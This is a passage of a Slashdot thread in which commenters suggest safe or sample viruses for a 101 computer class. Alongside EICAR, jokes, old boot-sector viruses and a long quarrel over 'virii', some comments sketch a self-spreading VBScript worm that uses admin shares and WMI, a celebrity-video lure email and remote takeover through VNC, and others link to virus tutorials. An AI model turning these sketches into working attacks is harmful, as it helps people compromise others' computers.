      Now if you could only find a site distributing Antivirus 2010. If you do, make sure you're using a Linux machine when you visit the site. If your class understands that there's more to the world than Windows, see how long it takes them to understand why there can't really be an AV program "scanning the C: drive."

    12. Re:EICAR by yuna49 · · Score: 1

      Oh, how about one more example?

      Put eicar.com on a website, then send an email with an embedded URL and a subject line having to do with nude celebrity videos. You know, the "Hey dude! Wassup! Check out this hot video of Angelina and Brad getting it on!" variety.

      Make sure you craft an HTML version so the URL isn't displayed or use a TinyURL link.

    13. Re:EICAR by xouumalperxe · · Score: 1

      This'll look exactly the same as a real virus, and it will be easy to clean off, but it won't propagate or do nasty things like a real virus.

      It's too easy to remove. Delete the file, et voilà. If the point of the exercise is "Viruses aren't that daunting, they're just a bit of work to remove", the EICAR test file is as adequate as telling people "check that 1 + 1 returns 2" to teach them how to properly use a calculator

    14. Re:EICAR by leuk_he · · Score: 1

      in a 101 course you should not play with things that could have bigger consequences if something went wrong.

      SO:
      -Eicar will trigger a virus scanner. easy enough. If it breaks free from the lab it will do no harm(as explained by others)

      -If you want something hard to remove let them manually remove MSN live, or some other autoinstall package, where you remove it from the control panel, so the uninstall option is not available.

      -You want a package that can do more harm? Install VNC as a service by hand,and add RDP You can take over their PC for extra shock points.

    15. Re:EICAR by pinkushun · · Score: 1

      How did I not know about this, thanks! :)

    16. Re:EICAR by Anonymous Coward · · Score: 0

      What I'd like to know is: how did you guess my Windows password?

  6. You may already have one by Anonymous Coward · · Score: 2, Funny

    Windows? Fairly easy to remove.

    1. Re:You may already have one by monkyyy · · Score: 1

      troll? no this should get +5 insightful

      --
      warning pointless sig
    2. Re:You may already have one by spazdor · · Score: 1

      :p
      Bringing up Windows in a question about viruses? You're right, that takes a huge leap of insight and originality here on Slashdot!

      --
      DRM: Terminator crops for your mind!
    3. Re:You may already have one by The+Hatchet · · Score: 1

      funny? no this should get +5 troll

      Fixed it for you.

      Now that that is done, I might note that Windows doesn't act like a virus. You can easily remove it, it doesn't spread across things and tell you what you are allowed to do, if you know how to use it. Apple and apple products on the other hand are as close to virii as an operating system can get.

      --
      Where is the mod rating for "scary"? Also, ...
    4. Re:You may already have one by Krneki · · Score: 1

      Windows? Fairly easy to remove.

      Easy you say?

      Every time I manage to replace one with a Linux box, I get an asshole who installs 2 new. This shit is spreading like plague in our VMware environment.

      --
      Love many, trust a few, do harm to none.
  7. Norton by cjfs · · Score: 3, Insightful

    I don't even know if I'm joking.

    1. Re:Norton by frosty_tsm · · Score: 4, Insightful

      I don't even know if I'm joking.

      You missed a requirement: easy for the students to remove by hand

    2. Re:Norton by offrdbandit · · Score: 0, Redundant

      That's not gonna work. The OP wants the students to be able to remove it.

    3. Re:Norton by Dogbertius · · Score: 1

      Don't feel bad. I've been tricked into installing Norton as well :(

    4. Re:Norton by Cipher13 · · Score: 1, Redundant

      He did specify that it should be "easy to remove by hand"...

    5. Re:Norton by syousef · · Score: 1

      I don't even know if I'm joking.

      You missed a requirement: easy for the students to remove by hand

      All computer viruses are easy to remove by hand. Just rip the computer out of the electrical and network sockets and throw the computer out the window. Use your hands to do this.

      --
      These posts express my own personal views, not those of my employer
    6. Re:Norton by cjfs · · Score: 1

      You missed a requirement: easy for the students to remove by hand

      He didn't say what that hand was holding...

    7. Re:Norton by Ihmhi · · Score: 3, Funny

      You can use an acetylene torch with just one hand, I'm sure.

    8. Re:Norton by gagol · · Score: 1

      An arc welder would also do the job. I am pretty sure the virus would be gone. The real challenge is to keep the computer operational...

      --
      Tomorrow is another day...
    9. Re:Norton by nemesisrocks · · Score: 1

      I don't even know if I'm joking.

      You missed a requirement: easy for the students to remove by hand

      I presume he meant Norton was the virus. In which case, even Symantec can't remove it, let alone by hand.

    10. Re:Norton by plcurechax · · Score: 1

      You missed a requirement: easy for the students to remove by hand

      I took that to mean that the kids need a steady hand and very tiny magnetic needles to physically edit the disk sectors by hand.

      I just figured it was a gym teacher stuck teaching home-ec (economics, "domestic science") class that was bored with knitting stupid hats.

  8. EICAR? by Anonymous Coward · · Score: 1, Informative

    This has been around forever. http://www.eicar.org/anti_virus_test_file.htm

    1. Re:EICAR? by Barny · · Score: 2, Insightful

      No, the guy wants a live virus that the students need to be able to remove, not an inert file that will simply trip an AV scanner to remove it.

      --
      ...
      /me sighs
  9. CIH by Anonymous Coward · · Score: 0

    This looks like a good candidate. The good ol' times... When you caught one, well, that was a lesson learned. Viruses are not what they used to be, but that's just the old fart in me talking.

  10. IP/Login? by Anonymous Coward · · Score: 0

    What's your IP address/login? I can help with a sample virus.

    1. Re:IP/Login? by lewko · · Score: 1

      127.0.0.1

      --
      Do you or your partner snore? - Visit www.snoring.com.au
  11. Note to self... by tool462 · · Score: 3, Insightful

    Do NOT click on any links posted in the comments on this article.

    1. Re:Note to self... by h4rr4r · · Score: 5, Funny

      Note to tool462, stop using windows.

    2. Re:Note to self... by ROMRIX · · Score: 1

      I did, now my computer pops up a message every 5 minutes saying "All your Base are belong to us!"
      damit..

    3. Re:Note to self... by Anonymous Coward · · Score: 0

      But then how would he be a tool!?

    4. Re:Note to self... by PHAT64 · · Score: 0

      Best post so far. As a response to a few of the hidden comments from the anonymous cowards:
      - He's not being a dick. It's actually great advice.
      - Yes, there are exploits for linux, assuming he's using linux, fuckhead.
      - You don't make sense.
      - Most of the links on this post, possibly all, only affect Windows.
      - He is a tool.

      To beav007: Protip: Shut up. Go act smart somewhere else. Your input is useless.

    5. Re:Note to self... by flyingkillerrobots · · Score: 1

      Wrong. If I were attempting to place infected links onto a slashdot forum, I would probably use something targeting Linux, as it has a significant market share in this community, and the targets tend to be more confident that they won't get viruses.

      --
      "It is a good thing for an uneducated man to read books of quotations..." -Winston Churchill
    6. Re:Note to self... by Anonymous Coward · · Score: 0

      Uninstall Windows.
      Stop being able to perform work to satisfaction.
      Lose job.
      Miss mortgage payment.
      Become homeless.

      Your superiority complex isn't helping.

    7. Re:Note to self... by Anonymous Coward · · Score: 0

      Glad I'm using Windows, where my biggest worry is not clicking on links that say "here's a virus".
      Must suck to be using whatever FOSStard system you're using.

    8. Re:Note to self... by mcgrew · · Score: 0, Flamebait

      Exploit != virus. Any computer can be cracked, but only Windows computers have viruses in the wild.

    9. Re:Note to self... by mcgrew · · Score: 1

      You should stop listening to Microsoft's marketing department. "Marketshare" is meaningless in this context*. Apple manufactures millions of computers a year; more than enough to make targeting them with viruses worthwhile, yet Apple is as immune from viruses as Linux is. It's a lot harder to write a virus for a Mac or Linux; both have *nix underpinnings. Unix was developed from the get-go to be networked, WinDOS was designed to be a standalone system.

      Windows 7 is far more secure than any previous version of Windows, but it's still a hell of a lot easier to break than any other OS.

      *Especially when talking about Linux; relatively few copies of that OS are paid for. You can download any distro for free, and there's no good way of counting them all. I've installed Linux on half a dozen PCs from the same downloaded disk, so distro download counts are meaningless. Browser spoofing makes server logs just as meaningless for counting the number of Linux boxes surfing the net.

    10. Re:Note to self... by mcgrew · · Score: 0, Troll

      Glad I'm using Windows, where my biggest worry is not clicking on links that say "here's a virus".
      Must suck to be using whatever FOSStard system you're using.

      Your OS is the only one on the planet that you have to worry about clicking a link that says "here's a virus". Why would that suck? Are you a malware writer by chance? *Nix/BSD/Apple users have computers that WORK. You don't.

      Oh, and a "FOSStard" is someone who isn't smart enough to get rid of the most insecure OS on the planet, dumbass, NOT someone who uses a stable, secure OS that has all the apps needed when the OS is installed. FOSStard? How much did you pay for MS office? How much does McAfee/Symantec get from you every month? Did you have fun punching in that 40 digit gibberish when you installed Windows (or even a new hard drive) so MS knows you didn't pirate it? No, you probably never saw that gibberish, since Windows came with the computer and you never had your PC's case open, and wouldn't know a router from a modem.

      Grow the fuck up and stop trying to troll intelligent people, moron. If you're happy with Windows, fine. But there's no call for coming to a nerd site and insulting everyone who has a higher IQ than you (which is probably everybody).

      Get back under your bridge, troll.

    11. Re:Note to self... by Anonymous Coward · · Score: 0

      Merely clicking on a link isn't going to do shit if it's just a virus. And no, you're wrong.

  12. Not a virus by Anonymous Coward · · Score: 0

    but how about the love bug? ok so you'd have to have the machines set up with a vulnerable version of outlook or something but not only do you have an easily hand-removed candidate, your students can look at the script contents afterwards.

  13. Sneeze on them by airfoobar · · Score: 1

    Works on the students, too.

  14. Michelangelo by extremescholar · · Score: 1

    Use Michelangelo, your favorite Ninja Turtle and March 6th event!

    --
    Using the Freedom of Speech while I still have it.
  15. Another Option by Anonymous Coward · · Score: 0

    Might I suggest a tutorial and a simulator...maybe an LC-3 simulator and stack smashing exercise to demonstrate a method of exploiting poorly written code? See the well written document Smashing the Stack for Fun and Profit.

    1. Re:Another Option by X0563511 · · Score: 1

      Yea, er... did you miss the FIRST TWO FUCKING SENTENCES of the post?

      Here, in case you really did:

      Currently I am teaching a 101 class on computers. It is more of a demystifying the black box type of class.

      --
      For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...
  16. Stoned by PacoSuarez · · Score: 4, Interesting

    Stoned is a classic and a pleasure to disassemble. It fits in a boot sector (512 bytes) and it's not particularly malicious, but it has all the elements that a virus needs. I don't know if it would still work on a modern computer, though: Some old viruses used funky instructions that became obsolete (like "POP CS"), and this one seems to have issues working on large-capacity disks.

    1. Re:Stoned by BlackHawk-666 · · Score: 1

      IIRC that's a boot sector virus that propagates when a sector read is performed on a floppy drive. Modern labs are pretty unlikely to still have floppy drives. The code to stoned is written in Assembler too, so they would need to be taught that to understand it. They'll also need a good understanding of the old DOS BIOS interrupt codes to make sense of what it's doing.

      That's all good for us guys who grew up hacking in the 80s, not so great for the modern ones.

      --
      All those moments will be lost in time, like tears in rain.
    2. Re:Stoned by itwerx · · Score: 1

      Or if you really want to get retro, (and remove any risk of propagation by network), get some DOS boot disks and the Pakistani Brain Virus.

      (For history buffs: the first "real" PC virus evar, which I hand-disassembled on legal paper so I could write what might have been one of the first virus removal tools - a simple hex edit of the boot sector to skip over its code. :)

      Oh, yeah, and get offa my lawn!

    3. Re:Stoned by Anonymous Coward · · Score: 0

      Are you kidding? Stoned is nasty. "Not particularly malicious"? You call corrupting the partition table not malicious? Back in 1994 our college computers were plagued with it. I had personal experience with it and as the lab technician for the LAN class I was tasked with scanning and cleaning every damned floppy the class had.

      If you want a simple and easy "virus" write a quick word macro virus.

  17. Fake it. by blair1q · · Score: 1

    Virii all have different signatures, so it doesn't matter what signature you choose.

    Just write a script that pokes something into the registry and adds a funny file to the Windows system directory, and use it on each computer before class.

    Then write a script that pretends to find it and tell them where it is when they run it in class.

    Ask them what they should do next.

    1. Re:Fake it. by Missing.Matter · · Score: 4, Informative

      The plural of virus is viruses. Just like the plural of abacus is abacuses, not abacai. Viri (or even worse, virii) annoys the hell out of me.

    2. Re:Fake it. by blair1q · · Score: 4, Informative

      Well, if you want to get all prissy about the Latin, then it's incorrect to use the word to describe a single unit of the substance, in the way it's not correct to call a single water molecule "a water". Id est, since a viral program is itself a cell in the viral infection of many computers, there's no term for it other than "viral program" and no term for several of them other than "viral programs". The "virus" would be some arbitrarily bounded subset of the population of said viral programs infecting machines, which could devolve to a single program infecting a single machine, but would still not be the correct term for that program or, indeed, for the viral infection being suffered by that machine. It could correctly refer to the running program and its data (which in most computers includes its instructions) and the progress of its states, but I'm pretty sure nobody much thinks of it that clearly when using the word "virus". Nor is it correct to use "a virus" to refer to a type of virus (exempli gratia Stuxnet, Sasser, Hopper, et cetera) but only to an instance of that type of virus as it is spreading, or, again, some arbitrary subset thereof, wherein it has its physical expression and aggregate, fluid form.

      As for whether it annoys you for people to use a latinate word that is both convenient and apt despite its not being precisely Latin, well, tough titty, because apparently the Latin version of it is a mispronunciation of the Proto-Indo-European word for the same gooey mess, so insisting on going only as far back as Latin for the value of correctness of form is false cognitive closure, and that gives everyone else cause to be annoyed at you.

    3. Re:Fake it. by Anonymous Coward · · Score: 0

      Oh, stop being a crybabii

    4. Re:Fake it. by Barny · · Score: 0

      If I only had mod points...

      Not only did you school him in language, but you did it for Latin. +2 internet points sir

      As for the grand-parent, sure its Latin roots are interesting (as the parent shows) but with English, all words are subject to change without notice, otherwise we would not have such cromulent words as D'oh and Embiggen.

      --
      ...
      /me sighs
    5. Re:Fake it. by godrik · · Score: 1

      hat off.

      PS: I frequently use scenarii which, I learnt recently, should not be used in English.

    6. Re:Fake it. by Anonymous Coward · · Score: 0

      scenarii is not correct Italian either (just as virii is not correct Latin or English, which is why the earlier poster said it annoyed him)

      For the record, it is scenarios in English and scenari in Italian, and viruses in English, and no known plural at all in Latin (but even if it had one, it would NOT have been virii).

    7. Re:Fake it. by Anonymous Coward · · Score: 0

      Kudos.

    8. Re:Fake it. by Internalist · · Score: 4, Interesting

      +5, Informative?...REALLY?!?...

      OK, let's start with a handily recent post on the Language Log about Latin plurals (the post is about "syllabus", but "virus/viruses/*viri/**virii" show up in the comments).

      Now, onward...

      Well, if you want to get all prissy about the Latin, then it's incorrect to use the word to describe a single unit of the substance, in the way it's not correct to call a single water molecule "a water".

      Actually (and ignoring the somewhat startling categorisation of computer virus as "substance"), not in the same way at all. You can't call a single molecule of water "a water" because "water" is a mass noun in English, and those don't (i) take indefinite articles, and (ii) don't pluralize nicely (inter alia). It's possible that this portion of your argument comes from here, which points out that in Latin, "virus" ("poison") was a mass noun. Of course, in English, "virus" is very clearly a count noun in English, since it can be (and overwhelmingly is) used with an indefinite article.

      Id est, since a viral program is itself a cell in the viral infection of many computers, there's no term for it other than "viral program" and no term for several of them other than "viral programs".

      You appear in the preceding to be claiming that the word "virus" doesn't exist in English (or perhaps simply that it has no referent) a claim some information security researchers (and doctors!) might take issue with (cue lambasting for the stranded preposition in 3...2..1).

      That being said, this raises an interesting point about...something. Maybe the type/token distinction? When someone says "I wrote a virus", we take him (or her, I suppose) to be making a claim about an implementation of some specific algorithm in some specific language, but not to any particular token of it.

      The "virus" would be some arbitrarily bounded subset of the population of said viral programs infecting machines, [...]

      I don't understand the grounds on which you're making this claim.

      [...] which could devolve to a single program infecting a single machine, but would still not be the correct term for that program or, indeed, for the viral infection being suffered by that machine. It could correctly refer to the running program and its data (which in most computers includes its instructions) and the progress of its states,

      OK, so the "running program, and its data" counts pretty much as a "single token of the substance" at hand, in my book. So now it sounds like you're contradicting your opening claim.

      but I'm pretty sure nobody much thinks of it that clearly when using the word "virus".

      As I just mentioned, you seem to be contradicting yourself (although I may just be misreading you), so you'll forgive if I take claims of clear thinking only quasi-seriously.

      Nor is it correct to use "a virus" to refer to a type of virus (exempli gratia Stuxnet, Sasser, Hopper, et cetera) [...]

      Why is this 'incorrect'? "I wrote a virus. I'm calling it Johnny5." Seems like a perfectly good use of "a virus" to me.

      [...] but only to an instance of that type of virus as it is spreading, [...]

      Again, isn't this in contradiction to how you started this comment?

      or, again, some arbitrary subset thereof, wherein it has its physical expression and aggregate, fluid form.

      Aside from the impossibility of "some arbitrary subset" of an instance (I'll assume that was just a typo/thinko), now you're just engaged in verbal wankery. I mean, I suppose you might choose to model the spread of contagion in a network of computers as the flow of a kind of flu

      --
      Research is what I'm doing when I don't know what I'm doing. -- Wernher von Braun
    9. Re:Fake it. by Anonymous Coward · · Score: 0, Flamebait

      What a clever response. Unfortunately (for you), you're still a pretentious knob.

    10. Re:Fake it. by Anonymous Coward · · Score: 0

      yay for linguists! ^_^

    11. Re:Fake it. by Anonymous Coward · · Score: 0

      Thanks, Man! Abacai sounds like a great D&D name!

    12. Re:Fake it. by Anonymous Coward · · Score: 0

      So where, in this bundle of bullshit, is your admission that virii is just embarrassingly wrong on so many levels?

    13. Re:Fake it. by Combatso · · Score: 1

      They are both examples of Pretentious knobii

    14. Re:Fake it. by Anonymous Coward · · Score: 0

      Hah.... You got +4!

    15. Re:Fake it. by Anonymous Coward · · Score: 1, Insightful

      You both fail RFC1122:1.2.2

    16. Re:Fake it. by blair1q · · Score: 1

      Simply put there was no PIE to be "mispronounced" when there were Latin speakers.

      And there is no Latin any longer, as any Latin professor will tell you when informing you that there should be no accent whatsoever on the language when spoken by a native English speaker, because that is the only equitable way to deal with the fact that we have no way of knowing what the accent would have been.

      As for the "subset of an instance" part, an instance of water is an ocean. A subset of an ocean is a sea. A subset of a sea is a droplet. And so on.

      And, essentially, the point kinda sorta whooshed over your head. In English the word "virus" is not used the same way it should be in Latin, so there's no basis for complaining that its plural is not correct Latin. As you point out, it's an English word now, and we're keepin' it.

    17. Re:Fake it. by blair1q · · Score: 1

      I believe that's Knobii Pretentiensis.

    18. Re:Fake it. by blair1q · · Score: 1

      yay for cunning linguists! ^_^

      FTFY.

    19. Re:Fake it. by blair1q · · Score: 1

      It's nowhere because it's not.

      English is an agglomeration of many languages, so how it chooses to apply rules from those languages is necessarily in violation of them all, nearly all the time.

      What's embarrassing is that there are now about 100,000 virii that have to be tracked, quarantined, and removed from systems daily, and someone thinks the words used to describe it are what's worth getting upset over.

    20. Re:Fake it. by Combatso · · Score: 1

      ahh yes, it's been a while since my Douchebaggery in the 21st Century social science class..

    21. Re:Fake it. by Bobb+Sledd · · Score: 1

      Oh shut up already. We don't give a crap about your Latin skills. My dictionary says:

      World English Dictionary
      virus (ˈvaɪrəs)

      — n , pl -ruses

      http://dictionary.reference.com/browse/virus

      --
      "They said I probly shouldn't fly with just one eye," "I am Bender. Please insert girder."
    22. Re:Fake it. by blair1q · · Score: 1

      Dictionaries are descriptive, not prescriptive. If your dictionary doesn't tell you what "virii" means, then your dictionary is incomplete.

    23. Re:Fake it. by Bobb+Sledd · · Score: 1

      My dictionary has cactus and cacti. It has syllabus, syllabuses and syllabi. It has virus, and viruses. But no virii.

      If none of my dictionaries have the word "virii" it means it doesn't exist and you made it up. So if you want it to be a real word, then go write Merriam Webster and ask them to add it.

      Otherwise, I suggest you make a citation to one (and the Urban Dictionary doesn't count).

      --
      "They said I probly shouldn't fly with just one eye," "I am Bender. Please insert girder."
    24. Re:Fake it. by Bobb+Sledd · · Score: 1

      Actually, I take it back: I think I will let you quote the Urban Dictionary:

      1. virii

      buy virii mugs, tshirts and magnets
      Virii is in fact an INCORRECT pluralization of "virus", however, some retard keeps resubmitting it as the plural form.

      --
      "They said I probly shouldn't fly with just one eye," "I am Bender. Please insert girder."
    25. Re:Fake it. by Anonymous Coward · · Score: 0

      I'll have a water and she'll have a coffee.

      See ... you can say "a water" just fine.

    26. Re:Fake it. by Lanteran · · Score: 1

      You sir, have been promoted to grammar Hitler.

      --
      "People don't want to learn linux" hasn't been a valid excuse since '03.
    27. Re:Fake it. by blair1q · · Score: 1

      You don't have enough dictionaries, causing you to suffer from false cognitive closure as well.

      http://www.wordnik.com/words/virii

      In Latin, "virus" has no plural, the way in English "water" has no plural. It's uncountable.

      In English, however, "virus" applies to things that aren't amorphous gooey substance, but are instead computer programs.

      Once you've broken one rule by making an uncountable noun refer to a countable thing, there's no reason not to use it to refer to multiple countable things by breaking another rule.

      I.e., if the Romans had had computers, and used "virus" to refer to a computer program, they could easily have used "virii" to refer to multiple such computer programs, but they wouldn't for any reason have used "viruses", and probably would have flung you from the Tarpeian Rock for trying to give them a reason.

    28. Re:Fake it. by Internalist · · Score: 1

      Um...thanks?

      --
      Research is what I'm doing when I don't know what I'm doing. -- Wernher von Braun
    29. Re:Fake it. by Internalist · · Score: 1

      This probably should have been modded higher; it's an astute observation. You can, indeed, say "a water", but pretty much only in the context you've highlighted here, you're actually using some kind of elliptical form to say "a [vessel filled with] water", i.e. you're effectively saying something other than what we're discussing above.

      --
      Research is what I'm doing when I don't know what I'm doing. -- Wernher von Braun
    30. Re:Fake it. by Bobb+Sledd · · Score: 1

      You're clearly an idiot.

      Wordnik.com (that you linked to) shows a single dictionary that has that as a definition: Wiktionary. Ooooh, credible.

      --
      "They said I probly shouldn't fly with just one eye," "I am Bender. Please insert girder."
    31. Re:Fake it. by Slayer+Silver+Wolf · · Score: 1

      What’s really funny is that of all the posts replying to this one, not one of you has actually gotten the correct spelling of the plural. If you knew your English properly you would realise that plurals of words in the English language that end with an s do not get es added to the end but rather an apostrophe; therefore the correct plural of virus is virus'.

  18. DON'T DO IT! You'll get fired by CPE1704TKS · · Score: 5, Insightful

    It sounds instructive, but you will probably get fired for lacking good judgement.

    There are plenty of stories where teachers do similar things that end up getting them fired. Teaching students how to write viruses, faking a classroom kidnapping, how to plan a terrorist attack, etc.

    Teaching your students how to write a virus is a classic case of bad judgement. Your superiors will tell you "What were you thinking?" and you will get let go.

    Teach them verbally how viruses are created, but don't assign anything as homework.

  19. Two testing options and a removal tool by Anonymous Coward · · Score: 0

    There are a couple testing files and sites that exist for testing antiviruses that might be of interest. The one that I've used to ensure anti-virus software was functioning was EICAR which is a simple text file that virus definitions recognize but which does not actively do anything. This is useful for demonstrating that software is working, what a virus response looks like and how to remove a virus if it is found. Since it does nothing, it is only useful as a test and doesn't really get into how to deal with a fully compromised system.

    An alternative is Spycar which will perform actions targeted in demonstrating browser exploits. It wouldn't be available in a non-internet lab, but you might be able to adapt the links there by putting the files up on an intranet.

    http://www.spycar.org/Spycar.html referenced at http://www.pcworld.com/article/125138/put_your_antispyware_apps_to_the_test.html

    http://www.eicar.org/anti_virus_test_file.htm referenced in a variety of places, including http://www.sophos.com/pressoffice/news/articles/2003/01/eicar.html

    Removal scenarios vary according to how messed up a machine is by an infection. I usually use Trinity Rescue Kit as a first test for computers I don't trust or know have virus issues.

    TRK: http://trinityhome.org/

    I use MalwareBytes from http://www.malwarebytes.org/ in some cases and found it to be more effective than many of the other solutions, even in the free version.

  20. AOL 3.0 by stevedmc · · Score: 0

    F-Prot used to detect AOL as a virus. Install an older version of AOL such as AOL 3.0 and see if your students can remove it.

    1. Re:AOL 3.0 by lennier1 · · Score: 1

      To be fair, it was annoying and could cause problems with the system. ;)

  21. Stuxnet by Anonymous Coward · · Score: 0

    It certainly needs some demystification!

  22. Go fish... by clone53421 · · Score: 2, Informative

    Just pick any of the scores of .exe files masquerading as cracks on LimeWire. You’ll have to turn off the AV and executable file filter to download it, of course...

    --
    Alexander Peter Kristopeit bought his basement from his mommy for one dollar.
    1. Re:Go fish... by phyrexianshaw.ca · · Score: 1

      You’ll have to turn off the AV and executable file filter to download it, of course...

      turn off... the... what..? am I the only person in the world these days that doesn't run AV on personal PC's? jebus, I wouldn't even know what to buy anymore.

    2. Re:Go fish... by clone53421 · · Score: 1

      jebus, I wouldn't even know what to buy anymore.

      Well, that’s easy, at least. ESET NOD32.

      --
      Alexander Peter Kristopeit bought his basement from his mommy for one dollar.
    3. Re:Go fish... by AltairDusk · · Score: 1

      I would personally recommend Avast! or Avira Antivir. Both have free versions that work well. (Antivir scored better in the AV-comparatives tests but it does pop up a window with a link to buy the pro version after it downloads updates once per day).

    4. Re:Go fish... by Anonymous Coward · · Score: 0

      I recommend Antivirus 2010. Now that one catches viruses I didn't even know existed!

  23. Re:Simple by Anonymous Coward · · Score: 0

    hurrr durrr ur hilerius

  24. Good times by gmuslera · · Score: 1

    No matter how safe the OS they are using is, or what antivirus they have to run there, the biggest risk is on the other side of the keyboard. Show them the Good Times "virus"; a bit of social engineering is easier to see than abstract code.

    1. Re:Good times by Anonymous Coward · · Score: 0

      agreed

  25. do it wrong, do it in VBScript by Anonymous Coward · · Score: 0

    I'm going to assume you are using Windows, because the only classes that use Macs to teach are Art and OA. (FLAME ON! ;D)

    Step 1. Make sure the lab you are going to infect with anything that self replicates is logically isolated from the rest of the world. I mean, punching out a self replicating VB script is fun when it goes to plan, less fun when the Feds knock on your door after your 'virus' accidentally breaks loose...

    Step 2. Learn yourself some VB Script. Piss easy to use. It'll take a few hours for you to knock up a script that is capable of copying itself to the "c$" on all the Windows machines on the subnet, then kick up the script remotely using WMI (providing the users have administrative access to all machines). http://gallery.technet.microsoft.com/ScriptCenter/en-us

    Step 3. Make sure you get written permission from your supervisor to do this kind of thing. The last thing you need is a cranky boss coming down on you for "teaching people about the virus, when you are supposed to be teaching them about the email!!"

    Tips: Create a routine in your code that checks for "c:\stop.txt" or somesuch and kills itself if it finds it (we've got SkyNet by the balls now!). Use the "WScript.Sleep TIME_IN_MILLISECONDS" command so that your network isn't completely screwed over by all the traffic you are about to generate. Outside of this, get creative. Enjoy.

    1. Re:do it wrong, do it in VBScript by Hegh · · Score: 1

      If you write your own, you may not want to include propagation beyond any single machine. No risk of getting out that way. Just make it tricky for a user to remove, to show the various techniques that may be needed (hiding in multiple places, being started from registry keys and other locations, running multiple processes that each monitor the others so it's tough to kill them all, ...). Good luck, and ask for permission before doing it!

      --
      Bravery is not a function of firepower.
      ~J.C. Denton (Deus Ex)
  26. Simple... by Anonymous Coward · · Score: 0

    Watch porn on your windows laptop -> connect laptop to network -> ??? -> Success

  27. There's virus source out there. Be careful. by bersl2 · · Score: 1

    Obviously, you should know exactly what it is that the virus is doing. No, not approximately: I mean all the way down to the machine instruction level. If it comes only in a binary, disassemble and figure out everything. Use virtual machines to add a layer of protection, and be aware that some malware knows it's being run in a VM and may behave differently under these conditions. Of course, those are much more than you need.

    The safest bet is to write your own. That way, you know what it's doing.

    1. Re:There's virus source out there. Be careful. by TheDarkMaster · · Score: 1

      I agree. The author of TFA can research writing Windows services, boot blocks, etc., and write his own (and funny) virus to get some fun for his students. As an example, I wrote some time ago a very funny and simple program with just one function: draw random icons in a non-stop fashion on the "main window" of Windows (accessible by the Windows API, the window ID where all windows are drawn). It is funny trying to stop this when your desktop is flooded with cute icons and any program you try to open is flooded too :)

      --
      Religion: The greatest weapon of mass destruction of all time
  28. If you have to ask... by vipvop · · Score: 1

    First of all, EICAR isn't helpful at all, it's simply a magic string that AV software is supposed to pick up. It won't teach anyone anything about how a virus actually works.

    Second, if you have to ask /. about this, you probably shouldn't be playing with these things. There are a million virus writing guides out there, a simple search turns up pages like this:

    http://vx.netlux.org/lib/static/vdat/tutorial.htm

    Most of these tutorials were written a long time ago, with topics such as infecting .com files (not that anyone remembers what those are anymore). If you want a simple overwriting virus, that isn't hard to find examples of or make at all. However, there won't be a way for the students to clean the infected files, as the information in the beginning of the file will have been lost. If you want something that infects .EXEs while still letting them run without problems, you're going to end up with complicated code that adds sections onto an executable, modifies the EXE header, etc. While none of this is too hard to understand if you have programming ability and time to sit there and look at how it works, what you're looking for won't exist at a Computers 101 level.

    1. Re:If you have to ask... by X0563511 · · Score: 1

      ... which is fine, because he's not teaching them how to write a virus, but how to recognize and respond to an infection!

      Lots of words put down, when you didn't properly read the post. At least you noticed EICAR wasn't suitable :)

      --
      For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...
    2. Re:If you have to ask... by vipvop · · Score: 1

      Remove by hand to me means manually disinfecting a non-overwriting virus. It's not that hard to do if you can follow assembly language, have a knowledge of the executable's format, and know a bit about how a virus works. For your average virus of the 90s, simply changing the program's entry point back to the original location was sufficient to disinfect a file, and it was easy to find this location as the virus always stores it (at least if the program's still going to run).

      In retrospect he probably meant how to use some kind of AV software, but to me that's removing with the use of software, not by hand.

    3. Re:If you have to ask... by X0563511 · · Score: 1

      My impression was something more along the lines of booting into safe mode and removing a worm (that was otherwise non-destructive - like that one that caused RPC to die a while back?).

      I've had to do that once. Nobody had a fix out yet, and I managed to nail the thing into place long enough to kill it from a foreign system. It was a learning experience :)

      --
      For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...
  29. I would Recommend by Anonymous Coward · · Score: 0

    Stuxnet seems to be popular. And if any of the students have nuclear ambitions it'll soon put an end to that.

  30. Try stuxnet by velja27 · · Score: 1

    Try getting yourself one of those stuxnet worms, I hear they are pretty good.

  31. Re:DON'T DO IT! You'll get fired by Anonymous Coward · · Score: 0

    Mod parent up. It may be cool and the kids will love you for it, but when push comes to shove, the cow pies will hit the fan.

  32. Re:DON'T DO IT! You'll get fired by jmottram08 · · Score: 3, Insightful

    Nowhere was it mentioned about creating one. Ever. It was mentioned about how to REMOVE one, and to illustrate how they spread.

    It wasn't even mentioned that this is a coding class.

    It is a class about computers, and he wants to teach virus removal.

    Stop being such a lawyer and actually read the summary ffs.

  33. Re:DON'T DO IT! You'll get fired by Keith111 · · Score: 1

    Heh this is probably correct... Best would be to go get some virus CODE and display it on a screen and step through how it hooks itself into a system. A great thing to use here is the 0ldschool types that would infect the exe headers and plant itself at the end. Or some that do the code cave storage. Then move from there and show them rootkits, as they are pretty much just a way more advanced version of those. Plenty of resources online for that. One particular book that is somewhat old now but still really informative http://www.amazon.com/Rootkits-Subverting-Windows-Greg-Hoglund/dp/0321294319

  34. Re:DON'T DO IT! You'll get fired by WitnessForTheOffense · · Score: 1

    RTFA again. He said he would install it and they would remove it. While your point about how doing this could possibly get him fired still stands, he's talking about only having the students remove it.

  35. Write Your Own by PiAndWhippedCream · · Score: 1

    Just code your own virus. You'll know how to remove it. Alternatively, if you are teaching an advanced class as well, have those students write it.

  36. Re:DON'T DO IT! You'll get fired by Tripp-phpBB · · Score: 1

    He asked for a simple virus the students can remove by hand, not how to create them. I think the point he's trying to make is using a computer safely and if you do get a virus, what to do and how to remove it. I suppose the reason he asked to compile it is so he can see the source code? Or maybe I'm just an insensitive clod!

  37. A WONDERFUL teaching tool - master Michelangelo! by Auroch · · Score: 1

    Something oldschool. So even when administration DOES try to fire you, you can say "REALLY? Over a virus that infects floppies, on a network that doesn't have a single floppy drive installed?". Just don't do it on the first week of May.

    --
    Quartz Extreme and Core Image. Are there any other real reasons to spend all that money on generic hardware?
  38. Pascal virus by bigato · · Score: 1

    Here: http://members.rediff.com/eggo/viruspascal.htm This is a really simple virus that you could use. Sorry the page is in Portuguese, but the code itself is easy to understand.

  39. Re:DON'T DO IT! You'll get fired by Missing.Matter · · Score: 1

    At my university, we have a computer security lab just for this purpose. It's completely isolated from the internet and the campus network, with all computers, servers, switches, etc. available for student access.

